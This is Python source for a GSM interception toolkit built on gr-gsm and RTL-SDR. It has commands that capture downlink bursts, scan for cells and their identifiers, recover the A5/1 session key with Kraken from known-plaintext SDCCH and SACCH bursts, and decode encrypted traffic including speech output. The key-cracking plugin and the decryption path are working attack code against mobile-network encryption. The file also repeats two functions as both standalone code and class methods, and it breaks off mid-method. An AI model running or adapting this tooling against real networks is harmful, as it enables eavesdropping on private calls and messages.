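def capture_rtlsdr(self, args):
    """Record GSM downlink traffic with an RTL-SDR via gr-gsm's ``grgsm_capture``.

    The target channel is taken from ``args.freq`` or ``args.arfcn`` (with an
    optional ``args.band``); ppm, sample rate and gain fall back to the
    ``rtl_sdr`` section of the config provider.  At least one destination
    (``args.cfile`` or ``args.bursts``) is required.  Errors are reported with
    ``self.printmsg`` followed by an early return, like the other commands in
    this file.

    Args:
        args: parsed command-line namespace with freq, arfcn, band, ppm,
            samp_rate, gain, cfile, bursts, print_bursts, gsmtap and length.
    """
    path = self._config_provider.get("gr-gsm", "apps_path")
    capture = imp.load_source("", os.path.join(path, "grgsm_capture.py"))

    def _resolve_channel(freq, arfcn_num, band):
        # Same validation/conversion the other commands use.  The numeric ARFCN
        # is kept under its own name on purpose: the original assigned it to
        # ``arfcn``, which shadowed the ``arfcn`` helper module and made the
        # first ``arfcn.is_valid_*`` call fail with AttributeError.
        # Returns (freq, arfcn_num, band, error_message_or_None).  When no band
        # is given and none matches, ``band`` is left at the last band tried.
        if freq is not None:
            if band:
                if not arfcn.is_valid_downlink(freq, band):
                    return freq, arfcn_num, band, "Frequency is not valid in the specified band"
                arfcn_num = arfcn.downlink2arfcn(freq, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_downlink(freq, band):
                        arfcn_num = arfcn.downlink2arfcn(freq, band)
                        break
        elif arfcn_num is not None:
            if band:
                if not arfcn.is_valid_arfcn(arfcn_num, band):
                    return freq, arfcn_num, band, "ARFCN is not valid in the specified band"
                freq = arfcn.arfcn2downlink(arfcn_num, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_arfcn(arfcn_num, band):
                        freq = arfcn.arfcn2downlink(arfcn_num, band)
                        break
        return freq, arfcn_num, band, None

    freq, arfcn_num, band, error = _resolve_channel(args.freq, args.arfcn, args.band)
    if error is not None:
        self.printmsg(error)
        return

    # RTL-SDR parameters: command line first, config file as documented default.
    ppm = args.ppm
    sample_rate = args.samp_rate
    gain = args.gain
    if ppm is None:
        ppm = self._config_provider.getint("rtl_sdr", "ppm")
    if sample_rate is None:
        sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
    if gain is None:
        gain = self._config_provider.getint("rtl_sdr", "gain")

    cfile = None
    burstfile = None
    if args.cfile is not None:
        cfile = self._data_access_provider.getfilepath(args.cfile)
    if args.bursts is not None:
        burstfile = self._data_access_provider.getfilepath(args.bursts)
    if cfile is None and burstfile is None:
        self.printmsg("You must provide either a cfile or a burst file as destination.")
        return

    # Use the class from the module loaded above (decode/scan do the same);
    # the original ignored ``capture`` and relied on a bare ``grgsm_capture`` name.
    tb = capture.grgsm_capture(fc=freq, gain=gain, samp_rate=sample_rate, ppm=ppm,
                               arfcn=arfcn_num, cfile=cfile, burst_file=burstfile,
                               band=band, verbose=args.print_bursts,
                               gsmtap=args.gsmtap, rec_length=args.length)

    def signal_handler(signum, frame):
        # Ctrl-C: stop the flowgraph so the tb.wait() below returns.
        tb.stop()
        tb.wait()

    signal.signal(signal.SIGINT, signal_handler)
    tb.start()
    tb.wait()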
class A51ReconstructionPlugin(PluginBase):
    """Command plugin ``a51_kraken``.

    Drives the analysis flowgraphs defined elsewhere in the project
    (ImmediateAssignmentExtractor, CMCFinder, CMCAnalyzer, SICollector) over a
    burst file and hands the resulting burst sets to
    KrakenA51ReconstructorAdapter.  All user feedback goes through
    ``self.printmsg``; failures return early instead of raising.
    """
    # Which channel(s) the burst sets are taken from; see --attack-mode.
    attack_modes = ['SDCCH', 'SACCH', 'SDCCH/SACCH']
    # Channel configuration of the input capture; see -m.
    channel_modes = ['BCCH', 'BCCH_SDCCH4', 'SDCCH8']

    @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode. This determines on which channels to search for messages that can be cracked.", default="BCCH_SDCCH4")
    @arg("--attack-mode", action="store", dest="attackmode", choices=attack_modes, help="Attack mode. This determines on which channels to search for messages that can be cracked.", default="SDCCH/SACCH")
    @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot of the Immediate Assignment or Cipher Mode Command.", default=0)
    @arg("-v", action="store_true", dest="verbose", help="If enabled the command displays verbose information.")
    @arg_exclusive(args=[
        arg("--cfile", action="store_path", dest="cfile", help="cfile."),
        arg("--bursts", action="store_path", dest="bursts", help="bursts.")
    ])
    @arg_group(name="Cfile Options", args=[
        arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the cfile capture."),
        arg("-f", action="store", dest="freq", type=float, help="Frequency of the cfile capture."),
        arg("-b", action="store", dest="band", choices=arfcn.get_bands(), help="GSM of the cfile capture."),
        arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."),
        arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."),
        arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.")
    ])
    @arg_exclusive(args=[
        arg("--frame-ia", action="store", dest="fnr_ia", type=int, help="Framenumber of the Immediate Assignment."),
        arg("--frame-cmc", action="store", dest="fnr_cmc", type=int, help="Framenumber of the Cipher Mode Command.")
    ])
    @cmd(name="a51_kraken", description="Reconstruct A51 session key from captured messages using Kraken TMTO.")
    def a51_kraken(self, args):
        """Command entry point.

        Exactly one of ``args.fnr_cmc`` / ``args.fnr_ia`` must be given; the
        Cipher Mode Command frame number is either used directly or located via
        the Immediate Assignment.  Only the burst file (``args.bursts``) is read
        here; the "Cfile Options" are accepted but not used by this method.
        Returns None; all outcomes are reported with ``self.printmsg``.
        """
        fnr_cmc = args.fnr_cmc
        timeslot = args.timeslot
        subchannel = None
        is_cmc_provided = False
        burst_file = args.bursts
        mode = args.mode
        if args.fnr_cmc is not None:
            is_cmc_provided = True
        elif args.fnr_ia is not None:
            ia_extractor = ImmediateAssignmentExtractor(burst_file, timeslot, mode, args.fnr_ia)
            ia_extractor.start()
            ia_extractor.wait()
            error = True
            # NOTE: the user-supplied mode is overridden on this path; it becomes
            # SDCCH8 only when the matching IA reports channel type "SDCCH/8".
            mode = "BCCH_SDCCH4"
            immediate_assignments = ia_extractor.extract_immediate_assignment.get_frame_numbers()
            for i in range(len(immediate_assignments)):
                if immediate_assignments[i] == args.fnr_ia:
                    self.printmsg("Immediate Assignment at %s" % immediate_assignments[i])
                    # timeslot/subchannel of the assigned channel replace the CLI values
                    timeslot = ia_extractor.extract_immediate_assignment.get_timeslots()[i]
                    subchannel = ia_extractor.extract_immediate_assignment.get_subchannels()[i]
                    if ia_extractor.extract_immediate_assignment.get_channel_types()[i] == "SDCCH/8":
                        mode = "SDCCH8"
                    error = False
                    break
            if error:
                self.printmsg("No valid framenumber for immediate assignment was provided.")
                return
            cmc_finder = CMCFinder(burst_file, timeslot, subchannel, mode, args.fnr_ia)  # ToDo: channeltype from ia
            cmc_finder.start()
            cmc_finder.wait()
            fnr_cmc = cmc_finder.get_cmc()
            if fnr_cmc is None:
                self.printmsg("No cipher mode command was found.")
                return
        else:
            self.printmsg("No valid framenumber for cipher mode command or immediate assignment was provided.")
            return
        # Frame-number window handed to the analyzer; the inline comments are the
        # author's own note that wrap-around at the maximum frame number is not handled.
        fnr_start = fnr_cmc - 2 * 102  # should be (args.fnr_cmc - 3 * 102 + max_fnr) mod max_fnr
        fnr_end = fnr_cmc + 3 * 102 + 3  # should be (args.fnr_cmc + 3 * 102 + 3) mod max_fnr
        cmc_analyzer = CMCAnalyzer(timeslot, burst_file, mode, fnr_start, fnr_end)
        cmc_analyzer.start()
        cmc_analyzer.wait()
        if not cmc_analyzer.is_a51_cmc(fnr_cmc):
            self.printmsg("Cipher Mode Command at %s does not assign A5/1" % fnr_cmc)
            return
        else:
            self.printmsg("Cipher Mode Command at %s" % fnr_cmc)
        if is_cmc_provided:
            subchannel = cmc_analyzer.get_subchannel(fnr_cmc)
        kraken_burst_sets = cmc_analyzer.createLapdmUiBurstSets(fnr_cmc)
        kraken_adapter = KrakenA51ReconstructorAdapter(self._config_provider)
        key_found = False
        # First pass: burst sets from the analyzer (skipped for --attack-mode SACCH).
        if args.attackmode != "SACCH":
            sdcch_counter = 0
            for burst_set in kraken_burst_sets:
                if sdcch_counter % 4 == 0 and args.verbose:
                    self.printmsg("Using SDCCH message bursts %s - %s" % (burst_set.frame_number, burst_set.frame_number + 4))
                sdcch_counter += 1
                key = kraken_adapter.send2kraken(burst_set, args.verbose)
                if key is not None:
                    key_found = True
                    self.printmsg("Key found: %s" % key)
                    break
                else:
                    # self.printmsg("%s - no key found" % burst_set.frame_number)
                    pass
        if key_found or args.attackmode == "SDCCH":
            return
        # self.printmsg("Starting attack on SACCH")
        # Second pass: find the last SACCH system-information message before the
        # CMC; its second byte is used as the timing advance below.
        last_sit_fnr = -1
        last_si_type = None
        timingadvance = -1
        plaintext_si_msgs = dict()
        for sit_fnr in cmc_analyzer.sacch_sits:
            if sit_fnr > last_sit_fnr and sit_fnr < fnr_cmc:
                last_sit_fnr = sit_fnr
                # extract timing advance
                last_si_type = cmc_analyzer.sacch_sits[sit_fnr][1]
                data_string = cmc_analyzer.sacch_sits[sit_fnr][2]
                # byte_arr = array.array('B', data_string.decode("hex"))
                byte_list = self.byte_string_to_list(data_string)
                timingadvance = byte_list[1]
                # add the system information messages from the attacked sacch
                # those should have the right timing advance anyway (at least in most cases)
                if not plaintext_si_msgs.has_key(last_si_type):
                    plaintext_si_msgs[last_si_type] = byte_list
        if last_sit_fnr == -1:
            self.printmsg("Could not determine last System Information message")
            return
        # self.printmsg("Last SI message at " + str(last_sit_fnr))
        si_collector = SICollector(timeslot, burst_file, mode)
        si_collector.start()
        si_collector.wait()
        # collect all system information message types used on SACCH by the network
        for t in si_collector.si_messages:
            # there can be at most four different system information message types on SACCH.
            if len(plaintext_si_msgs) >= 4:
                break
            # if the type is not in the plaintext dictionary or has another timing advance
            # we put it in the dict
            if not plaintext_si_msgs.has_key(t) or plaintext_si_msgs[t][1] != timingadvance:
                plaintext_si_msgs[t] = self.byte_string_to_list(si_collector.si_messages[t])
        for msg in plaintext_si_msgs:
            # correct timing advance
            if plaintext_si_msgs[msg][1] != timingadvance:
                plaintext_si_msgs[msg][1] = timingadvance
        # create bursts for all system information message types
        plaintext_si_bursts = dict()
        for msg in plaintext_si_msgs:
            plaintext_si_bursts[msg] = self.message_to_bursts(plaintext_si_msgs[msg])
        sacch_si_types = ["System Information Type 5", "System Information Type 5bis", "System Information Type 5ter", "System Information Type 6"]
        if not plaintext_si_msgs.has_key("System Information Type 5bis"):
            sacch_si_types.remove("System Information Type 5bis")
        if not plaintext_si_msgs.has_key("System Information Type 5ter"):
            sacch_si_types.remove("System Information Type 5ter")
        type_pool = cycle(sacch_si_types)
        dropwhile(lambda x: x != last_si_type, type_pool)
        next(type_pool)  # next one would last_si_type, which we use as starting point
        # assemble burst sets
        sacch_burst_sets = []
        for i in range(1, 4):
            type_of_msg = next(type_pool)  # expected type of next message
            fnr_of_msg = last_sit_fnr + i * 102
            bursts_of_plaintext = plaintext_si_bursts[type_of_msg]
            for j in range(0, 4):
                fnr = fnr_of_msg + j
                check_burst_index = 0 if j > 0 else 1
                sacch_burst_sets.append(A5BurstSet(
                    fnr,  # framenumber of the burst we want to use
                    cmc_analyzer.bursts[fnr],  # data (payload) of the burst we want to use
                    bursts_of_plaintext[j],  # plaintext data (payload) of a lapdm ui message
                    fnr_of_msg + check_burst_index,  # framenumber of verification burst.
                    # we use the first burst of the message as check burst, if j > 0
                    cmc_analyzer.bursts[fnr_of_msg + check_burst_index],  # data (payload) of the verification burst
                    bursts_of_plaintext[check_burst_index]  # plaintextdata (payload) of the verification burst
                ))
        sacch_counter = 0
        for burst_set in sacch_burst_sets:
            if sacch_counter % 4 == 0 and args.verbose:
                self.printmsg("Using SACCH message bursts %s - %s" % (burst_set.frame_number, burst_set.frame_number + 4))
            sacch_counter += 1
            key = kraken_adapter.send2kraken(burst_set, args.verbose)
            if key is not None:
                key_found = True
                self.printmsg("Key found: %s" % key)
                break
            else:
                pass
                # self.printmsg("%s - no key found" % burst_set.frame_number)
        # self.printmsg("I am done....")
        # Todo: look at a lapdm ui message: if randomized, we wont do the attempt on sdcch

    def byte_string_to_list(self, string):
        """Return the bytes of a hex-encoded string as a list of ints.

        Python 2 only: relies on ``str.decode("hex")``.
        """
        byte_arr = array.array('B', string.decode("hex"))
        return byte_arr.tolist()

    def message_to_bursts(self, message_bytes):
        """Run the external ``gsmframecoder`` on *message_bytes* and return its burst lines.

        The message is passed as one upper-case hex argument (argument list,
        no shell).  Every second line starting at index 2 is taken from the
        tool's output; an output shorter than 9 lines yields an empty list.
        """
        result = []
        message = ""
        for byte in message_bytes:
            message += "%0.2X" % byte
        output = check_output(["gsmframecoder", message]).split("\n")
        if len(output) >= 9:
            for i in range(4):
                result.append(output[(i + 1) * 2])
        return result
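class ScanPlugin(PluginBase):
    """Command plugin ``scan_rtlsdr``: sweep a GSM band with an RTL-SDR and list the cells found."""

    @arg("--speed", action="store", dest="speed", type=int, help="Scan speed. Value range 0-5.", default=4)
    @arg_group(name="RTL-SDR configuration", args=[
        arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."),
        arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."),
        arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.")
    ])
    @arg("-b", action="store", dest="band", choices=(arfcn.get_bands()), help="GSM band of the ARFCN.")
    @arg("-v", action="store_true", dest="verbose", help="Verbose output, including CCCH configuration, cell ARFCN\'s and neighbour ARFCN\'s")
    @cmd(name="scan_rtlsdr", description="Scan a GSM band using a RTL-SDR device.")
    def scan_rtlsdr(self, args):
        """Scan every ARFCN range of ``args.band`` and print one line per detected cell.

        The band is covered in steps of ``channels_num`` channels (derived from
        the sample rate); each step runs gr-gsm's ``wideband_scanner`` for
        ``6 - speed`` seconds of recording.  ppm, sample rate and gain fall back
        to the ``rtl_sdr`` config section.

        Raises:
            PluginError: if ``args.speed`` is outside 0-5.
        """
        if args.speed < 0 or args.speed > 5:
            raise PluginError("Invalid speed")
        path = self._config_provider.get("gr-gsm", "apps_path")
        grgsm_scanner = imp.load_source("", os.path.join(path, "grgsm_scanner"))

        band = args.band
        speed = args.speed
        ppm = args.ppm
        sample_rate = args.samp_rate
        gain = args.gain
        if ppm is None:
            ppm = self._config_provider.getint("rtl_sdr", "ppm")
        if sample_rate is None:
            sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
        if gain is None:
            gain = self._config_provider.getint("rtl_sdr", "gain")
        # NOTE(review): gain is resolved like in the other commands but never
        # handed to wideband_scanner() below -- confirm whether it accepts one.

        if band == 'DCS1800' or band == 'PCS1900':
            shmmni = self.get_shmmni()
            # None (sysctl output not understood) counts as "too low"; that is
            # what the original Python 2 comparison ``None < 32000`` did implicitly.
            if shmmni is None or shmmni < 32000:
                self.printmsg("Insufficient shared memory segments.\n"
                              "For scanning DCS1800 or PCS1900 you need to increase the value, i.e. using the following command:\n\n"
                              "sudo sysctl kernel.shmmni=32000")
                return

        channels_num = int(sample_rate / 0.2e6)
        # Offsets of the channels_num bins (0.2e6 apart) around the centre
        # frequency.  Depends only on channels_num, so compute it once instead
        # of once per sweep step as the original did.
        freq_offsets = numpy.fft.ifftshift(
            numpy.arange(int(-numpy.floor(channels_num / 2)),
                         int(numpy.floor((channels_num + 1) / 2))) * 2e5)

        for arfcn_range in arfcn.get_arfcn_ranges(args.band):
            try:
                first_arfcn = arfcn_range[0]
                last_arfcn = arfcn_range[1]
                last_center_arfcn = last_arfcn - int((channels_num / 2) - 1)
                current_freq = arfcn.arfcn2downlink(first_arfcn + int(channels_num / 2) - 1, band)
                last_freq = arfcn.arfcn2downlink(last_center_arfcn, band)
                stop_freq = last_freq + 0.2e6 * channels_num
                while current_freq < stop_freq:
                    found_list = []
                    # Silencer keeps rtl_sdr's console output out of ours.
                    with Silencer():
                        scanner = grgsm_scanner.wideband_scanner(rec_len=6 - speed,
                                                                 sample_rate=sample_rate,
                                                                 carrier_frequency=current_freq,
                                                                 ppm=ppm, args="")
                        scanner.start()
                        scanner.wait()
                        scanner.stop()
                        sysinfo = scanner.gsm_extract_system_info
                        detected_c0_channels = sysinfo.get_chans()
                        if detected_c0_channels:
                            chans = numpy.array(detected_c0_channels)
                            found_freqs = current_freq + freq_offsets[chans]
                            cell_ids = numpy.array(sysinfo.get_cell_id())
                            lacs = numpy.array(sysinfo.get_lac())
                            mccs = numpy.array(sysinfo.get_mcc())
                            mncs = numpy.array(sysinfo.get_mnc())
                            ccch_confs = numpy.array(sysinfo.get_ccch_conf())
                            powers = numpy.array(sysinfo.get_pwrs())
                            for i, chan in enumerate(chans):
                                cell_arfcn_list = sysinfo.get_cell_arfcns(chan)
                                neighbour_list = sysinfo.get_neighbours(chan)
                                found_list.append(grgsm_scanner.channel_info(
                                    arfcn.downlink2arfcn(found_freqs[i], band), found_freqs[i],
                                    cell_ids[i], lacs[i], mccs[i], mncs[i], ccch_confs[i],
                                    powers[i], neighbour_list, cell_arfcn_list))
                        scanner = None  # release the flowgraph before the next step
                    for info in sorted(found_list):
                        self.printmsg(str(info))
                        if args.verbose:
                            self.printmsg(info.get_verbose_info())
                    current_freq += channels_num * 0.2e6
            except KeyboardInterrupt:
                self.printmsg("Stopping.")
                # The original announced the stop but went on with the next
                # ARFCN range; Ctrl-C should end the whole scan.
                break

    def get_shmmni(self):
        """Return the kernel's ``kernel.shmmni`` value, or None if the sysctl output is not understood.

        Runs ``sysctl kernel.shmmni`` with an argument list (no shell) and
        takes the number after ``=`` in ``kernel.shmmni = <n>``.  The original
        used ``str.strip("kernel.shmmni = ")``, which strips a *set* of
        characters from both ends rather than a prefix.

        Raises:
            subprocess.CalledProcessError / OSError: if sysctl fails or is missing
            (unchanged from the original).
        """
        result = subprocess.check_output(["sysctl", "kernel.shmmni"], stderr=subprocess.STDOUT)
        if not isinstance(result, str):  # Python 3 returns bytes
            result = result.decode("ascii", "replace")
        if result.startswith("kernel.shmmni"):
            _, sep, value = result.partition("=")
            if sep:
                return int(value)
        return None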
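class CapturePlugin(PluginBase):
    """Command plugin ``capture_rtlsdr``: record GSM downlink traffic with an RTL-SDR via gr-gsm's ``grgsm_capture``."""

    @arg_group(name="Capturing", args=[
        arg("--gsmtap", action="store_true", dest="gsmtap", help="Output to GSMTap.", default=False),
        arg("--print-bursts", action="store_true", dest="print_bursts", help="Print captured bursts.", default=False),
        arg("--length", action="store", dest="length", type=int, help="Length of the record in seconds."),
        arg("--cfile", action="store_path", dest="cfile", help="cfile."),
        arg("--bursts", action="store_path", dest="bursts", help="bursts."),
    ])
    @arg_group(name="RTL-SDR configuration", args=[
        arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."),
        arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."),
        arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.")
    ])
    @arg_exclusive(args=[
        arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the BTS."),
        arg("-f", action="store", dest="freq", type=float, help="Frequency of the BTS.")
    ])
    @arg("-b", action="store", dest="band", choices=(arfcn.get_bands()), help="GSM band of the ARFCN.")
    @cmd(name="capture_rtlsdr", description="Capture and save GSM transmissions using a RTL-SDR device.")
    def capture_rtlsdr(self, args):
        """Run the capture flowgraph until it finishes or SIGINT arrives.

        The target channel comes from ``args.freq`` or ``args.arfcn`` (plus an
        optional ``args.band``); ppm, sample rate and gain fall back to the
        ``rtl_sdr`` config section.  At least one of ``args.cfile`` /
        ``args.bursts`` is required.  Errors are reported with
        ``self.printmsg`` followed by an early return.
        """
        path = self._config_provider.get("gr-gsm", "apps_path")
        capture = imp.load_source("", os.path.join(path, "grgsm_capture.py"))

        freq, arfcn_num, band, error = self._resolve_channel(args.freq, args.arfcn, args.band)
        if error is not None:
            self.printmsg(error)
            return

        # RTL-SDR parameters: command line first, config file as documented default.
        ppm = args.ppm
        sample_rate = args.samp_rate
        gain = args.gain
        if ppm is None:
            ppm = self._config_provider.getint("rtl_sdr", "ppm")
        if sample_rate is None:
            sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
        if gain is None:
            gain = self._config_provider.getint("rtl_sdr", "gain")

        cfile = None
        burstfile = None
        if args.cfile is not None:
            cfile = self._data_access_provider.getfilepath(args.cfile)
        if args.bursts is not None:
            burstfile = self._data_access_provider.getfilepath(args.bursts)
        if cfile is None and burstfile is None:
            self.printmsg("You must provide either a cfile or a burst file as destination.")
            return

        # Use the class from the module loaded above (decode/scan do the same);
        # the original ignored ``capture`` and relied on a bare ``grgsm_capture`` name.
        tb = capture.grgsm_capture(fc=freq, gain=gain, samp_rate=sample_rate, ppm=ppm,
                                   arfcn=arfcn_num, cfile=cfile, burst_file=burstfile,
                                   band=band, verbose=args.print_bursts,
                                   gsmtap=args.gsmtap, rec_length=args.length)

        def signal_handler(signum, frame):
            # Ctrl-C: stop the flowgraph so the tb.wait() below returns.
            tb.stop()
            tb.wait()

        signal.signal(signal.SIGINT, signal_handler)
        tb.start()
        tb.wait()

    @staticmethod
    def _resolve_channel(freq, arfcn_num, band):
        """Derive the missing half of the (frequency, ARFCN) pair.

        With a band the given value is validated and converted; without one
        the bands from ``arfcn.get_bands()`` are tried in order and the first
        match wins (if none matches, ``band`` is left at the last band tried,
        as in the original loop).  The numeric ARFCN is kept under its own name
        because the original assigned it to ``arfcn``, shadowing the ``arfcn``
        helper module and raising AttributeError on the first validity check.

        Returns:
            ``(freq, arfcn_num, band, error)`` where ``error`` is a message for
            the user when the value is not valid in the given band, else None.
        """
        if freq is not None:
            if band:
                if not arfcn.is_valid_downlink(freq, band):
                    return freq, arfcn_num, band, "Frequency is not valid in the specified band"
                arfcn_num = arfcn.downlink2arfcn(freq, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_downlink(freq, band):
                        arfcn_num = arfcn.downlink2arfcn(freq, band)
                        break
        elif arfcn_num is not None:
            if band:
                if not arfcn.is_valid_arfcn(arfcn_num, band):
                    return freq, arfcn_num, band, "ARFCN is not valid in the specified band"
                freq = arfcn.arfcn2downlink(arfcn_num, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_arfcn(arfcn_num, band):
                        freq = arfcn.arfcn2downlink(arfcn_num, band)
                        break
        return freq, arfcn_num, band, None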
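def decode(self, args):
    """Decode GSM bursts/messages from a capture with gr-gsm's ``grgsm_decode`` flowgraph.

    Channel selection comes from ``args.freq`` / ``args.arfcn`` (plus an
    optional ``args.band``); ppm, sample rate and gain fall back to the
    ``rtl_sdr`` config section; an optional A5 session key ``args.kc`` is
    parsed for decryption.  Errors are reported with ``self.printmsg``
    followed by an early return.
    """
    path = self._config_provider.get("gr-gsm", "apps_path")
    decoder = imp.load_source("", os.path.join(path, "grgsm_decode"))

    def _parse_kc(value):
        # Accepts '0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF' (8 comma-separated
        # hex bytes) or 16 hex digits.  Returns the 8 byte values, or None when
        # the text is malformed.  The original appended to a shared list and,
        # on error, only rebound a local name, so a bad key was passed on as a
        # partial list instead of being rejected.
        try:
            if ',' in value:
                parts = value.split(',')
            elif len(value) == 16:
                parts = [value[2 * i:2 * i + 2] for i in range(8)]
            else:
                return None
            key_bytes = [int(s, 16) for s in parts]
        except ValueError:
            return None
        if len(key_bytes) != 8 or any(b < 0 or b > 255 for b in key_bytes):
            return None
        return key_bytes

    def _resolve_channel(freq, arfcn_num, band):
        # Same validation/conversion the other commands use.  The numeric ARFCN
        # is kept under its own name: the original assigned it to ``arfcn``,
        # shadowing the ``arfcn`` helper module and raising AttributeError on
        # the first ``arfcn.is_valid_*`` call.  Returns
        # (freq, arfcn_num, band, error_message_or_None); without a band and
        # without a match, ``band`` is left at the last band tried.
        if freq is not None:
            if band:
                if not arfcn.is_valid_downlink(freq, band):
                    return freq, arfcn_num, band, "Frequency is not valid in the specified band"
                arfcn_num = arfcn.downlink2arfcn(freq, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_downlink(freq, band):
                        arfcn_num = arfcn.downlink2arfcn(freq, band)
                        break
        elif arfcn_num is not None:
            if band:
                if not arfcn.is_valid_arfcn(arfcn_num, band):
                    return freq, arfcn_num, band, "ARFCN is not valid in the specified band"
                freq = arfcn.arfcn2downlink(arfcn_num, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_arfcn(arfcn_num, band):
                        freq = arfcn.arfcn2downlink(arfcn_num, band)
                        break
        return freq, arfcn_num, band, None

    kc = []
    if args.kc is not None:
        kc = _parse_kc(args.kc)
        if kc is None:
            self.printmsg("Invalid Kc: %s" % args.kc)
            return

    freq, _, _, error = _resolve_channel(args.freq, args.arfcn, args.band)
    if error is not None:
        self.printmsg(error)
        return

    ppm = args.ppm
    sample_rate = args.samp_rate
    gain = args.gain
    if ppm is None:
        ppm = self._config_provider.getint("rtl_sdr", "ppm")
    if sample_rate is None:
        sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
    if gain is None:
        gain = self._config_provider.getint("rtl_sdr", "gain")
    # NOTE(review): gain is resolved but grgsm_decoder() below is not given it
    # (unchanged from the original) -- confirm whether the flowgraph accepts one.

    cfile = None
    burstfile = None
    if args.cfile is not None:
        cfile = self._data_access_provider.getfilepath(args.cfile)
    if args.bursts is not None:
        burstfile = self._data_access_provider.getfilepath(args.bursts)
    if cfile is None and burstfile is None:
        self.printmsg("You must provide either a cfile or a burst file as destination.")
        return

    # The original hard-coded enable_voice_boundary_detection=False; forward
    # the flag when the command defines it (getattr keeps older arg sets working).
    tb = decoder.grgsm_decoder(timeslot=args.timeslot, subslot=args.subslot, chan_mode=args.mode,
                               burst_file=burstfile, cfile=cfile, fc=freq,
                               samp_rate=sample_rate, a5=args.a5, a5_kc=kc,
                               speech_file=args.speech_output_file,
                               speech_codec=self.tch_codecs.get(args.speech_codec),
                               enable_voice_boundary_detection=getattr(args, "enable_voice_boundary_detection", False),
                               verbose=args.print_messages, print_bursts=args.print_bursts,
                               ppm=ppm)
    tb.start()
    tb.wait()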
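class DecoderPlugin(PluginBase):
    """Command plugin ``decode``: run gr-gsm's ``grgsm_decode`` flowgraph over a cfile or burst file."""

    channel_modes = ['BCCH', 'BCCH_SDCCH4', 'SDCCH8', 'TCHF']
    # CLI codec name -> gr-gsm TCH codec constant; order is the help-text order.
    tch_codecs = collections.OrderedDict([
        ('FR', grgsm.TCH_FS), ('EFR', grgsm.TCH_EFR),
        ('AMR12.2', grgsm.TCH_AFS12_2), ('AMR10.2', grgsm.TCH_AFS10_2),
        ('AMR7.95', grgsm.TCH_AFS7_95), ('AMR7.4', grgsm.TCH_AFS7_4),
        ('AMR6.7', grgsm.TCH_AFS6_7), ('AMR5.9', grgsm.TCH_AFS5_9),
        ('AMR5.15', grgsm.TCH_AFS5_15), ('AMR4.75', grgsm.TCH_AFS4_75)])

    @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode.", default="BCCH")
    @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot to decode.", default=0)
    @arg("--subslot", action="store", dest="subslot", type=int, help="Subslot to decode. Use in combination with channel type BCCH_SDCCH4 and SDCCH8.")
    @arg_exclusive(args=[
        arg("--cfile", action="store_path", dest="cfile", help="cfile."),
        arg("--bursts", action="store_path", dest="bursts", help="bursts.")
    ])
    @arg("--print-messages", action="store_true", dest="print_messages", help="Print decoded messages.", default=False)
    @arg("--print-bursts", action="store_true", dest="print_bursts", help="Print decoded bursts.", default=False)
    @arg_group(name="Cfile Options", args=[
        arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the cfile capture."),
        arg("-f", action="store", dest="freq", type=float, help="Frequency of the cfile capture."),
        arg("-b", action="store", dest="band", choices=arfcn.get_bands(), help="GSM of the cfile capture."),
        arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."),
        arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."),
        arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.")
    ])
    @arg_group(name="Decryption Options", args=[
        arg("-5", "--a5", action="store", dest="a5", type=int, help="A5 version.", default=1),
        arg("-k", "--kc", action="store", dest="kc", help="A5 session key Kc. Valid formats are '0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF' and '1234567890ABCDEF'"),
    ])
    @arg_group(name="TCH Options", args=[
        arg("-c", action="store", dest="speech_codec", choices=tch_codecs.keys(), help="TCH-F speech codec."),
        arg("-o", action="store", dest="speech_output_file", help="TCH/F speech output file"),
        arg("--voice-boundary-detect", action="store_true", dest="enable_voice_boundary_detection", help="Enable voice boundary detection for traffic channels. This can help reduce noise in the output.", default=False),
    ])
    @cmd(name="decode", description="Decodes GSM messages.")
    def decode(self, args):
        """Decode GSM bursts/messages from the given cfile or burst file.

        Channel selection comes from ``args.freq`` / ``args.arfcn`` (plus an
        optional ``args.band``); ppm, sample rate and gain fall back to the
        ``rtl_sdr`` config section; an optional A5 session key ``args.kc`` is
        parsed for decryption.  Errors are reported with ``self.printmsg``
        followed by an early return.
        """
        path = self._config_provider.get("gr-gsm", "apps_path")
        decoder = imp.load_source("", os.path.join(path, "grgsm_decode"))

        kc = []
        if args.kc is not None:
            kc = self._parse_kc(args.kc)
            if kc is None:
                self.printmsg("Invalid Kc: %s" % args.kc)
                return

        freq, _, _, error = self._resolve_channel(args.freq, args.arfcn, args.band)
        if error is not None:
            self.printmsg(error)
            return

        ppm = args.ppm
        sample_rate = args.samp_rate
        gain = args.gain
        if ppm is None:
            ppm = self._config_provider.getint("rtl_sdr", "ppm")
        if sample_rate is None:
            sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
        if gain is None:
            gain = self._config_provider.getint("rtl_sdr", "gain")
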